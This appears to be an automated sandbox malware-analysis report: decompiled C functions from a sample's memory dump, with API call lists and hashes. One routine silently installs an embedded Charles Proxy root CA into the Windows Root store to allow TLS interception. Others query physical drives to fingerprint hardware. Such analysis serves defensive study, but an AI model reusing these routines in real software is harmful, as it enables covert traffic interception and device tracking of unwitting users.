                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                    • Opcode ID: efa2235f1a2847ed0b6446073af2640c43a9e9fd204ca04507465df4fdaa2711
                                                                                                                                                                    • Instruction ID: c3865ccbcae920e215e079fb98926607579ac42653a45aa6abdb7f6c5b589da4
                                                                                                                                                                    • Opcode Fuzzy Hash: efa2235f1a2847ed0b6446073af2640c43a9e9fd204ca04507465df4fdaa2711
                                                                                                                                                                    • Instruction Fuzzy Hash: F4C04C7621420CABCB04DF98DCD4CAB77ADAB8CB10B10C508FB1D87200C634F9118BA4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    C-Code - Quality: 52%
                                                                                                                                                                    			E1001F720(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                    				int _v8;
                                                                                                                                                                    				int _v12;
                                                                                                                                                                    				char* _v16;
                                                                                                                                                                    				BYTE* _v20;
                                                                                                                                                                    				int _v24;
                                                                                                                                                                    				int _v28;
                                                                                                                                                                    				int _v32;
                                                                                                                                                                    				int _v36;
                                                                                                                                                                    				char _v299;
                                                                                                                                                                    				char _v300;
                                                                                                                                                                    				char _v563;
                                                                                                                                                                    				char _v564;
                                                                                                                                                                    				signed int _v568;
                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                    				BYTE* _t66;
                                                                                                                                                                    				int _t69;
                                                                                                                                                                    				int _t70;
                                                                                                                                                                    				int _t71;
                                                                                                                                                                    				long _t72;
                                                                                                                                                                    				int _t75;
                                                                                                                                                                    				signed int _t90;
                                                                                                                                                                    				void* _t120;
                                                                                                                                                                    				void* _t121;
                                                                                                                                                                    				void* _t122;
                                                                                                                                                                    				void* _t123;
                                                                                                                                                                    				void* _t124;
                                                                                                                                                                    				void* _t127;
                                                                                                                                                                    
                                                                                                                                                                    				_t119 = __esi;
                                                                                                                                                                    				_t118 = __edi;
                                                                                                                                                                    				_t91 = __ebx;
                                                                                                                                                                    				_v16 = "-----BEGIN CERTIFICATE-----\nMIIFTDCCBDSgAwIBAgIGAW3jTP9iMA0GCSqGSIb3DQEBCwUAMIGqMTswOQYDVQQD\nDDJDaGFybGVzIFByb3h5IENBICgxOSDljYHmnIggMjAxOSwgREVTS1RPUC1CTkFU\nMTFVKTElMCMGA1UECwwcaHR0cHM6Ly9jaGFybGVzcHJveHkuY29tL3NzbDERMA8G\nA1UECgwIWEs3MiBMdGQxETAPBgNVBAcMCEF1Y2tsYW5kMREwDwYDVQQIDAhBdWNr\nbGFuZDELMAkGA1UEBhMCTlowHhcNMDAwMTAxMDAwMDAwWhcNNDgxMjE1MDkxNTM3\nWjCBqjE7MDkGA1UEAwwyQ2hhcmxlcyBQcm94eSBDQSAoMTkg5Y2B5pyIIDIwMTks\nIERFU0tUT1AtQk5BVDExVSkxJTAjBgNVBAsMHGh0dHBzOi8vY2hhcmxlc3Byb3h5\nLmNvbS9zc2wxETAPBgNVBAoMCFhLNzIgTHRkMREwDwYDVQQHDAhBdWNrbGFuZDER\nMA8GA1UECAwIQXVja2xhbmQxCzAJBgNVBAYTAk5aMIIBIjANBgkqhkiG9w0BAQEF\nAAOCAQ8AMIIBCgKCAQEArobFBD7TTZn0T6MFLqNAR6f7vjMYix3CymRcoySeheVL\nSSHUmY/aaiIkfDLZCH10KvO/hQgDroweJfqtU/uP2CO3NT2aOsmSv5F/aTgmx5Dl\nOlQLEgtlU1COyVheRn0xC9Pvn7YXMd61Iut49D+CSzS+Nngtt6jLFizSIkexTkxa\n5jPtZlQjVKWZcb3cWRYOzcUhtEd8k8qeYk4K8AKYYCMA9dw2iBnDy58CYEY2iIJ2\ns6SYVwRztTKLCDTzJ8NCheMz2pIH4S8O27ZUyM8R48x8uhelLNfNQsEK4JWi5Oud\nPj82FIgkPwWEr0DnLW5uGCFJv7g0I4T2DxLhRzQljQIDAQABo4IBdDCCAXAwDwYD\nVR0TAQH/BAUwAwEB/zCCASwGCWCGSAGG+EIBDQSCAR0TggEZVGhpcyBSb290IGNl\ncnRpZmljYXRlIHdhcyBnZW5lcmF0ZWQgYnkgQ2hhcmxlcyBQcm94eSBmb3IgU1NM\nIFByb3h5aW5nLiBJZiB0aGlzIGNlcnRpZmljYXRlIGlzIHBhcnQgb2YgYSBjZXJ0\naWZpY2F0ZSBjaGFpbiwgdGhpcyBtZWFucyB0aGF0IHlvdSdyZSBicm93c2luZyB0\naHJvdWdoIENoYXJsZXMgUHJveHkgd2l0aCBTU0wgUHJveHlpbmcgZW5hYmxlZCBm\nb3IgdGhpcyB3ZWJzaXRlLiBQbGVhc2Ugc2VlIGh0dHA6Ly9jaGFybGVzcHJveHku\nY29tL3NzbCBmb3IgbW9yZSBpbmZvcm1hdGlvbi4wDgYDVR0PAQH/BAQDAgIEMB0G\nA1UdDgQWBBT40NxUNnz3lAIPi5J4Ol2KkSUfnzANBgkqhkiG9w0BAQsFAAOCAQEA\nZiJx651cdEyIOC3pi6NzIOYxIQTQQnOpIAeoZwl21lMOY0fQC73tExm7Z1TzYjdZ\nYJWSKRHjZhpwNU9roLeXp2JYvnreu4yNvu7Zd3YLgCcddLJETZL2wTN6N5tzVFsl\nHeX4gSuWJau7+u3BX4xsN0ubJt0P7wNRhfWJnYgZ5oncbbXwurv9Y3xSsb7IARW4\nifru1JPUES10SVStOr5mB8QaSi1le6Mw7RMfpOjCW7KO4YHc742pHBe/0wojyOro\nGxUu2F/5OK/DK
zT/2v+9ty2bsEBnv8h/V566ljexZeoAjqdAi8gmXzPAOb9g9QbS\nRaa1MBevyOFh1w7VsNdldg==\n-----END CERTIFICATE-----\n";
                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                    				if(CryptStringToBinaryA(_v16, 0, 0, 0,  &_v12, 0, 0) != 0 && _v12 > 0) {
                                                                                                                                                                    					_t66 = L1000CE56(__ebx, _v12, __edi, __esi, _v12);
                                                                                                                                                                    					_t122 = _t121 + 4;
                                                                                                                                                                    					_v20 = _t66;
                                                                                                                                                                    					_t133 = _v20;
                                                                                                                                                                    					if(_v20 != 0) {
                                                                                                                                                                    						CryptStringToBinaryA(_v16, 0, 0, _v20,  &_v12, 0, 0);
                                                                                                                                                                    						_t69 = _v12;
                                                                                                                                                                    						__imp__CertCreateCertificateContext(1, _v20, _t69);
                                                                                                                                                                    						_v8 = _t69;
                                                                                                                                                                    						_push(_v20);
                                                                                                                                                                    						_t70 = E1000CA30(__ebx, __edi, __esi, _t133);
                                                                                                                                                                    						_t123 = _t122 + 4;
                                                                                                                                                                    						if(_v8 != 0) {
                                                                                                                                                                    							__imp__CertOpenStore(0xa, 0, 0, 0x24000, L"Root");
                                                                                                                                                                    							_v28 = _t70;
                                                                                                                                                                    							if(_v28 != 0) {
                                                                                                                                                                    								_t71 = _v8;
                                                                                                                                                                    								__imp__CertAddCertificateContextToStore(_v28, _t71, 1, 0);
                                                                                                                                                                    								if(_t71 == 0) {
                                                                                                                                                                    									_t72 = GetLastError();
                                                                                                                                                                    									__eflags = _t72 - 0x80092005;
                                                                                                                                                                    									if(_t72 == 0x80092005) {
                                                                                                                                                                    										_v36 = 0;
                                                                                                                                                                    										_v32 = 0;
                                                                                                                                                                    										__imp__CertGetCertificateContextProperty(_v8, 3, 0,  &_v36);
                                                                                                                                                                    										__eflags = _v36;
                                                                                                                                                                    										if(_v36 > 0) {
                                                                                                                                                                    											_t75 = L1000CE56(__ebx,  &_v36, __edi, __esi, _v36 + 1);
                                                                                                                                                                    											_t124 = _t123 + 4;
                                                                                                                                                                    											_v32 = _t75;
                                                                                                                                                                    											__eflags = _v32;
                                                                                                                                                                    											if(_v32 != 0) {
                                                                                                                                                                    												E1000CF20(_t118, _v32, 0, _v36 + 1);
                                                                                                                                                                    												__imp__CertGetCertificateContextProperty(_v8, 3, _v32,  &_v36);
                                                                                                                                                                    												_v564 = 0;
                                                                                                                                                                    												E1000CF20(_t118,  &_v563, 0, 0x103);
                                                                                                                                                                    												_v300 = 0;
                                                                                                                                                                    												E1000CF20(_t118,  &_v299, 0, 0x103);
                                                                                                                                                                    												_t127 = _t124 + 0x24;
                                                                                                                                                                    												_v568 = 0;
                                                                                                                                                                    												while(1) {
                                                                                                                                                                    													__eflags = _v568 - _v36;
                                                                                                                                                                    													if(_v568 >= _v36) {
                                                                                                                                                                    														break;
                                                                                                                                                                    													}
                                                                                                                                                                    													E1000CC93(_t118, _t120 + _v568 * 2 - 0x128, "%02X",  *(_v32 + _v568) & 0x000000ff);
                                                                                                                                                                    													_t127 = _t127 + 0xc;
                                                                                                                                                                    													_t90 = _v568 + 1;
                                                                                                                                                                    													__eflags = _t90;
                                                                                                                                                                    													_v568 = _t90;
                                                                                                                                                                    												}
                                                                                                                                                                    												E1000CC93(_t118,  &_v564, "Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\%s",  &_v300);
                                                                                                                                                                    												_v24 = E1001F680(_a8, __eflags, 0x80000002,  &_v564, _a4, _a8);
                                                                                                                                                                    												_push(_v32);
                                                                                                                                                                    												E1000CA30(_t91, _t118, _t119, __eflags);
                                                                                                                                                                    											}
                                                                                                                                                                    										}
                                                                                                                                                                    									}
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_v24 = 1;
                                                                                                                                                                    								}
                                                                                                                                                                    								__imp__CertCloseStore(_v28, 1);
                                                                                                                                                                    							}
                                                                                                                                                                    							__imp__CertFreeCertificateContext(_v8);
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				return _v24;
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                                    • CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                                      • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                                      • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                                      • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                                    • CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                                    • CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1001F817
                                                                                                                                                                    • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F842
                                                                                                                                                                    • _memset.LIBCMT ref: 1001F87B
                                                                                                                                                                    • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 1001F891
                                                                                                                                                                    • _memset.LIBCMT ref: 1001F8AC
                                                                                                                                                                    • _memset.LIBCMT ref: 1001F8C9
                                                                                                                                                                    • _sprintf.LIBCMT ref: 1001F91C
                                                                                                                                                                    • _sprintf.LIBCMT ref: 1001F939
                                                                                                                                                                    • CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Cert$CertificateContext$Store_memset$BinaryCryptErrorFreeLastPropertyString_sprintf$CloseCreateHeapOpen___sbh_find_block___sbh_free_block
                                                                                                                                                                    • String ID: %02X$Root$Software\Microsoft\SystemCertificates\Root\Certificates\%s
                                                                                                                                                                    • API String ID: 3311258246-1857994723
                                                                                                                                                                    • Opcode ID: 5ddfbb8f852ddff57fa1320fe1c9e70ac928a395fe8b92145bd73a5c7497c889
                                                                                                                                                                    • Instruction ID: afe3fe35dc8e16d3553f6fe7244bb1c21b11eefa07642306de8368dfec16bcca
                                                                                                                                                                    • Opcode Fuzzy Hash: 5ddfbb8f852ddff57fa1320fe1c9e70ac928a395fe8b92145bd73a5c7497c889
                                                                                                                                                                    • Instruction Fuzzy Hash: 986133B5D00219BBEB10DB90CC99FFEB778EB48704F104598F605BA280D775AA85CFA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                    			E1001D7E0(void* __edi, intOrPtr _a4) {
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				void* _v12;
                                                                                                                                                                    				void* _v16;
                                                                                                                                                                    				void* _v20;
                                                                                                                                                                    				void* _v24;
                                                                                                                                                                    				void* _v28;
                                                                                                                                                                    				void* _v32;
                                                                                                                                                                    				void* _v36;
                                                                                                                                                                    				void* _v40;
                                                                                                                                                                    				signed short* _v44;
                                                                                                                                                                    				void* _v48;
                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                    				signed int* _v60;
                                                                                                                                                                    				char _v570;
                                                                                                                                                                    				short _v572;
                                                                                                                                                                    				char _v1596;
                                                                                                                                                                    				void* _v1600;
                                                                                                                                                                    				char _v1604;
                                                                                                                                                                    				long _v1608;
                                                                                                                                                                    				signed int _v1612;
                                                                                                                                                                    				void* _v1616;
                                                                                                                                                                    				void* _v1620;
                                                                                                                                                                    				void* _v1624;
                                                                                                                                                                    				void* _v1628;
                                                                                                                                                                    				void* _v1632;
                                                                                                                                                                    				signed int _v1633;
                                                                                                                                                                    				void _v1636;
                                                                                                                                                                    				char _v2148;
                                                                                                                                                                    				char _v2164;
                                                                                                                                                                    				void* _t88;
                                                                                                                                                                    				void* _t94;
                                                                                                                                                                    				void* _t123;
                                                                                                                                                                    				void* _t124;
                                                                                                                                                                    
                                                                                                                                                                    				_t123 = __edi;
                                                                                                                                                                    				_v52 = _a4;
                                                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                                                    					L18:
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v1600 = 0;
                                                                                                                                                                    				_v1612 = 0;
                                                                                                                                                                    				while(1 != 0) {
                                                                                                                                                                    					_v572 = 0;
                                                                                                                                                                    					E1000CF20(_t123,  &_v570, 0, 0x1fe);
                                                                                                                                                                    					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
                                                                                                                                                                    					_t124 = _t124 + 0x18;
                                                                                                                                                                    					_v48 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0);
                                                                                                                                                                    					if(_v48 == 0xffffffff) {
                                                                                                                                                                    						L15:
                                                                                                                                                                    						_v1612 = 1 + _v1612;
                                                                                                                                                                    						if(_v1612 < 4) {
                                                                                                                                                                    							continue;
                                                                                                                                                                    						}
                                                                                                                                                                    						return _v1600;
                                                                                                                                                                    					}
                                                                                                                                                                    					_v1608 = 0;
                                                                                                                                                                    					_v1636 = 0;
                                                                                                                                                                    					_v1632 = 0;
                                                                                                                                                                    					_v1628 = 0;
                                                                                                                                                                    					_v1624 = 0;
                                                                                                                                                                    					_v1620 = 0;
                                                                                                                                                                    					_v1616 = 0;
                                                                                                                                                                    					if(DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0) == 0) {
                                                                                                                                                                    						CloseHandle(_v48);
                                                                                                                                                                    						goto L15;
                                                                                                                                                                    					}
                                                                                                                                                                    					if((_v1633 & 0x000000ff) == 0) {
                                                                                                                                                                    						L11:
                                                                                                                                                                    						CloseHandle(_v48);
                                                                                                                                                                    						if(_v1600 == 0) {
                                                                                                                                                                    							goto L15;
                                                                                                                                                                    						}
                                                                                                                                                                    						return _v1600;
                                                                                                                                                                    					}
                                                                                                                                                                    					asm("sbb edx, edx");
                                                                                                                                                                    					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
                                                                                                                                                                    					_v40 = 0;
                                                                                                                                                                    					_v36 = 0;
                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                    					_v28 = 0;
                                                                                                                                                                    					_v24 = 0;
                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                    					E1000CF20(_t123,  &_v2164, 0, 0x210);
                                                                                                                                                                    					_t88 = E1001CF20( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
                                                                                                                                                                    					_t124 = _t124 + 0x24;
                                                                                                                                                                    					if(_t88 == 0) {
                                                                                                                                                                    						goto L11;
                                                                                                                                                                    					}
                                                                                                                                                                    					_v60 =  &_v1596;
                                                                                                                                                                    					_v44 =  &_v2148;
                                                                                                                                                                    					do {
                                                                                                                                                                    						 *_v60 =  *_v44 & 0x0000ffff;
                                                                                                                                                                    						_v44 =  &(_v44[1]);
                                                                                                                                                                    						_v60 =  &(_v60[1]);
                                                                                                                                                                    					} while (_v44 <  &_v1636);
                                                                                                                                                                    					_v56 = E1001CD70( &_v1596);
                                                                                                                                                                    					_t94 = E1001CFA0(_v56, 0x104, _v52);
                                                                                                                                                                    					_t124 = _t124 + 0x10;
                                                                                                                                                                    					if(_t94 == 0) {
                                                                                                                                                                    						_v1600 = 1;
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L11;
                                                                                                                                                                    				}
                                                                                                                                                                    				goto L18;
                                                                                                                                                                    			}






































                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 1001D831
                                                                                                                                                                    • wsprintfW.USER32 ref: 1001D84C
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D86B
                                                                                                                                                                    • DeviceIoControl.KERNEL32 ref: 1001D8E3
                                                                                                                                                                    • _memset.LIBCMT ref: 1001D96F
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 1001DA1A
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 1001DA37
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
                                                                                                                                                                    • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                    • API String ID: 381188756-2935326385
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                    			E1001DA70(void* __edi, intOrPtr _a4) {
                                                                                                                                                                    				struct _OVERLAPPED* _v8;
                                                                                                                                                                    				struct _OVERLAPPED* _v12;
                                                                                                                                                                    				void* _v16;
                                                                                                                                                                    				short _v532;
                                                                                                                                                                    				struct _OVERLAPPED* _v536;
                                                                                                                                                                    				struct _OVERLAPPED* _v540;
                                                                                                                                                                    				void _v544;
                                                                                                                                                                    				long _v548;
                                                                                                                                                                    				struct _OVERLAPPED* _v552;
                                                                                                                                                                    				intOrPtr _v10532;
                                                                                                                                                                    				void _v10556;
                                                                                                                                                                    				char _v11556;
                                                                                                                                                                    				void* _t56;
                                                                                                                                                                    				void* _t70;
                                                                                                                                                                    				void* _t71;
                                                                                                                                                                    
                                                                                                                                                                    				_t70 = __edi;
                                                                                                                                                                    				E10018AA0(0x2d20);
                                                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                                                    					L13:
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                    				_v552 = 0;
                                                                                                                                                                    				while(1 != 0) {
                                                                                                                                                                    					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
                                                                                                                                                                    					_t71 = _t71 + 0xc;
                                                                                                                                                                    					_v16 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0);
                                                                                                                                                                    					if(_v16 == 0xffffffff) {
                                                                                                                                                                    						L10:
                                                                                                                                                                    						_v8 =  &(_v8->Internal);
                                                                                                                                                                    						_v552 = _v8;
                                                                                                                                                                    						if(_v8 < 4) {
                                                                                                                                                                    							continue;
                                                                                                                                                                    						}
                                                                                                                                                                    						return _v12;
                                                                                                                                                                    					}
                                                                                                                                                                    					_v548 = 0;
                                                                                                                                                                    					_v536 = 0;
                                                                                                                                                                    					_v544 = 0;
                                                                                                                                                                    					_v540 = 0;
                                                                                                                                                                    					E1000CF20(_t70,  &_v10556, 0, 0x2710);
                                                                                                                                                                    					_t71 = _t71 + 0xc;
                                                                                                                                                                    					if(DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0) != 0) {
                                                                                                                                                                    						E1000CF20(_t70,  &_v11556, 0, 0x3e8);
                                                                                                                                                                    						E1001D040(_v10532,  &_v10556,  &_v11556);
                                                                                                                                                                    						_t56 = E1001CFA0( &_v11556, 0x104, _a4);
                                                                                                                                                                    						_t71 = _t71 + 0x24;
                                                                                                                                                                    						if(_t56 == 0) {
                                                                                                                                                                    							_v12 = 1;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					CloseHandle(_v16);
                                                                                                                                                                    					if(_v12 == 0) {
                                                                                                                                                                    						_v8 = _v552;
                                                                                                                                                                    						goto L10;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						return _v12;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				goto L13;
                                                                                                                                                                    			}



















                                                                                                                                                                    APIs
                                                                                                                                                                    • wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                                    • CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                                    • _memset.LIBCMT ref: 1001DB21
                                                                                                                                                                    • DeviceIoControl.KERNEL32 ref: 1001DB50
                                                                                                                                                                    • _memset.LIBCMT ref: 1001DB68
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 1001DBB4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$CloseControlCreateDeviceFileHandlewsprintf
                                                                                                                                                                    • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                    • API String ID: 1858725146-2935326385
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                                    			E1001D370(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                    				void* _v8;
                                                                                                                                                                    				struct _OVERLAPPED* _v12;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                    				void* _v24;
                                                                                                                                                                    				short _v540;
                                                                                                                                                                    				char _v1564;
                                                                                                                                                                    				long _v1568;
                                                                                                                                                                    				long _v1572;
                                                                                                                                                                    				intOrPtr _v1576;
                                                                                                                                                                    				struct _OVERLAPPED* _v1580;
                                                                                                                                                                    				struct _OVERLAPPED* _v1584;
                                                                                                                                                                    				struct _OVERLAPPED* _v1588;
                                                                                                                                                                    				struct _OVERLAPPED* _v1592;
                                                                                                                                                                    				struct _OVERLAPPED* _v1596;
                                                                                                                                                                    				struct _OVERLAPPED* _v1600;
                                                                                                                                                                    				struct _OVERLAPPED* _v1604;
                                                                                                                                                                    				void _v1608;
                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                    				int _t63;
                                                                                                                                                                    				void* _t64;
                                                                                                                                                                    				int _t76;
                                                                                                                                                                    				void* _t77;
                                                                                                                                                                    				void* _t96;
                                                                                                                                                                    				void* _t97;
                                                                                                                                                                    				void* _t98;
                                                                                                                                                                    				void* _t99;
                                                                                                                                                                    				void* _t100;
                                                                                                                                                                    
                                                                                                                                                                    				_t97 = __esi;
                                                                                                                                                                    				_t96 = __edi;
                                                                                                                                                                    				_t77 = __ebx;
                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                    				_v16 = _a4;
                                                                                                                                                                    				_v1584 = 0;
                                                                                                                                                                    				_v1580 = 0;
                                                                                                                                                                    				do {
                                                                                                                                                                    					wsprintfW( &_v540, L"\\\\.\\PhysicalDrive%d", _v12);
                                                                                                                                                                    					_t99 = _t99 + 0xc;
                                                                                                                                                                    					_v24 = CreateFileW( &_v540, 0xc0000000, 7, 0, 3, 0, 0);
                                                                                                                                                                    					if(_v24 != 0xffffffff) {
                                                                                                                                                                    						_v1572 = 0;
                                                                                                                                                                    						_v1608 = 0;
                                                                                                                                                                    						_v1604 = 0;
                                                                                                                                                                    						_v1600 = 0;
                                                                                                                                                                    						_v1596 = 0;
                                                                                                                                                                    						_v1592 = 0;
                                                                                                                                                                    						_v1588 = 0;
                                                                                                                                                                    						_t63 = DeviceIoControl(_v24, 0x74080, 0, 0,  &_v1608, 0x18,  &_v1572, 0);
                                                                                                                                                                    						__eflags = _t63;
                                                                                                                                                                    						if(_t63 != 0) {
                                                                                                                                                                    							_t64 = L1000CE56(_t77,  &_v1608, _t96, _t97, 0x221);
                                                                                                                                                                    							_t100 = _t99 + 4;
                                                                                                                                                                    							_v8 = _t64;
                                                                                                                                                                    							 *((char*)(_v8 + 0xa)) = 0xec;
                                                                                                                                                                    							_v1568 = 0;
                                                                                                                                                                    							__eflags = DeviceIoControl(_v24, 0x7c088, _v8, 0x21, _v8, 0x221,  &_v1568, 0);
                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                    								L10:
                                                                                                                                                                    								CloseHandle(_v24);
                                                                                                                                                                    								_push(_v8);
                                                                                                                                                                    								E1000CA30(_t77, _t96, _t97, __eflags);
                                                                                                                                                                    								_t99 = _t100 + 4;
                                                                                                                                                                    								__eflags = _v1584;
                                                                                                                                                                    								if(_v1584 == 0) {
                                                                                                                                                                    									_v12 = _v1580;
                                                                                                                                                                    									goto L13;
                                                                                                                                                                    								}
                                                                                                                                                                    								break;
                                                                                                                                                                    							}
                                                                                                                                                                    							_v20 = 0;
                                                                                                                                                                    							do {
                                                                                                                                                                    								 *(_t98 + _v20 * 4 - 0x618) =  *(_v8 + 0x10 + _v20 * 2) & 0x0000ffff;
                                                                                                                                                                    								_v20 = _v20 + 1;
                                                                                                                                                                    								__eflags = _v20 - 0x100;
                                                                                                                                                                    							} while (_v20 < 0x100);
                                                                                                                                                                    							_v1576 = E1001CD70( &_v1564);
                                                                                                                                                                    							_t76 = E1001CFA0(_v1576, 0x104, _v16);
                                                                                                                                                                    							_t100 = _t100 + 0x10;
                                                                                                                                                                    							__eflags = _t76;
                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                    								_v1584 = 1;
                                                                                                                                                                    							}
                                                                                                                                                                    							goto L10;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L13;
                                                                                                                                                                    					}
                                                                                                                                                                    					L13:
                                                                                                                                                                    					_v12 =  &(_v12->Internal);
                                                                                                                                                                    					_v1580 = _v12;
                                                                                                                                                                    				} while (_v12 < 4);
